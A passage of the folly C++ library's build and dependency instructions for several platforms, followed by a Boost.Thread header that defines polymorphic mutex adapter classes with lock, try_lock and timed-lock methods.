git clone https://github.com/facebook/folly.git
cd folly/folly
autoreconf -ivf
./configure CPPFLAGS="-I/opt/local/include" LDFLAGS="-L/opt/local/lib"
make
sudo make install
```
#### Windows (Vcpkg)
folly is available in [Vcpkg](https://github.com/Microsoft/vcpkg#vcpkg) and releases may be built via `vcpkg install folly:x64-windows`.
You may also use `vcpkg install folly:x64-windows --head` to build against `master`.
#### Other Linux distributions
- double-conversion (https://github.com/google/double-conversion)
Download and build double-conversion.
You may need to tell cmake where to find it.
[double-conversion/] `ln -s src double-conversion`
[folly/] `mkdir build && cd build`
[folly/build/] `cmake "-DCMAKE_INCLUDE_PATH=$DOUBLE_CONVERSION_HOME/include" "-DCMAKE_LIBRARY_PATH=$DOUBLE_CONVERSION_HOME/lib" ..`
[folly/build/] `make`
- additional platform specific dependencies:
Fedora >= 21 64-bit (last tested on Fedora 28 64-bit)
- gcc
- gcc-c++
- cmake
- automake
- boost-devel
- libtool
- lz4-devel
- lzma-devel
- snappy-devel
- zlib-devel
- glog-devel
- gflags-devel
- scons
- double-conversion-devel
- openssl-devel
- libevent-devel
Optional
- libdwarf-dev
- libelf-dev
- libunwind8-dev
| {
"pile_set_name": "Github"
} |
//////////////////////////////////////////////////////////////////////////////
//
// (C) Copyright Vicente J. Botet Escriba 2008-2009,2012. Distributed under the Boost
// Software License, Version 1.0. (See accompanying file
// LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
// See http://www.boost.org/libs/thread for documentation.
//
//////////////////////////////////////////////////////////////////////////////
#ifndef BOOST_THREAD_POLY_LOCKABLE_ADAPTER_HPP
#define BOOST_THREAD_POLY_LOCKABLE_ADAPTER_HPP
#include <boost/thread/poly_lockable.hpp>
namespace boost
{
//[poly_basic_lockable_adapter
template <typename Mutex, typename Base=poly_basic_lockable>
class poly_basic_lockable_adapter : public Base
{
public:
typedef Mutex mutex_type;
protected:
mutex_type& mtx() const
{
return mtx_;
}
mutable mutex_type mtx_; /*< mutable so that it can be modified by const functions >*/
public:
BOOST_THREAD_NO_COPYABLE( poly_basic_lockable_adapter) /*< no copyable >*/
poly_basic_lockable_adapter()
{}
void lock()
{
mtx().lock();
}
void unlock()
{
mtx().unlock();
}
};
//]
//[poly_lockable_adapter
template <typename Mutex, typename Base=poly_lockable>
class poly_lockable_adapter : public poly_basic_lockable_adapter<Mutex, Base>
{
public:
typedef Mutex mutex_type;
bool try_lock()
{
return this->mtx().try_lock();
}
};
//]
//[poly_timed_lockable_adapter
template <typename Mutex, typename Base=poly_timed_lockable>
class poly_timed_lockable_adapter: public poly_lockable_adapter<Mutex, Base>
{
public:
typedef Mutex mutex_type;
bool try_lock_until(chrono::system_clock::time_point const & abs_time)
{
return this->mtx().try_lock_until(abs_time);
}
bool try_lock_until(chrono::steady_clock::time_point const & abs_time)
{
return this->mtx().try_lock_until(abs_time);
}
bool try_lock_for(chrono::nanoseconds const & rel_time)
{
return this->mtx().try_lock_for(rel_time);
}
};
//]
}
#endif
| {
"pile_set_name": "Github"
} |